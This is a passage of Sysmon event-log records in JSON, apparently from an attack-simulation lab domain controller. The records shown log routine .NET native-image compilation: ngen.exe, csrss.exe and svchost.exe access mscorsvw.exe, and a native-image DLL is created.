ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:56.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2264-5F25-0000-0010E2580E00}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7639,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:56.897\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001012A80C00}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:56.897","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001012A80C00}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7640,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:56.897\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001012A80C00}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:56.897","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001012A80C00}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7641,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:56.897\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001012A80C00}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:56.897","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001012A80C00}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7642,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:57.304\r\nProcessGuid: {41C8662E-2264-5F25-0000-0010155D0E00}\r\nProcessId: 3536\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dd0-0\\System.Activities.DurableInstancing.dll\r\nCreationUtcTime: 2020-08-01 08:05:57.304","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:57.304","ProcessGuid":"{41C8662E-2264-5F25-0000-0010155D0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dd0-0\\System.Activities.DurableInstancing.dll","CreationUtcTime":"2020-08-01 08:05:57.304","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7643,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:57.350\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:57.350","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001097AB0C00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7644,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:57.350\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:57.350","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001097AB0C00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7645,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:57.350\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:57.350","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001097AB0C00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7646,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:57.554\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2265-5F25-0000-001061680E00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:57.554","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2265-5F25-0000-001061680E00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:57.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2265-5F25-0000-001061680E00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 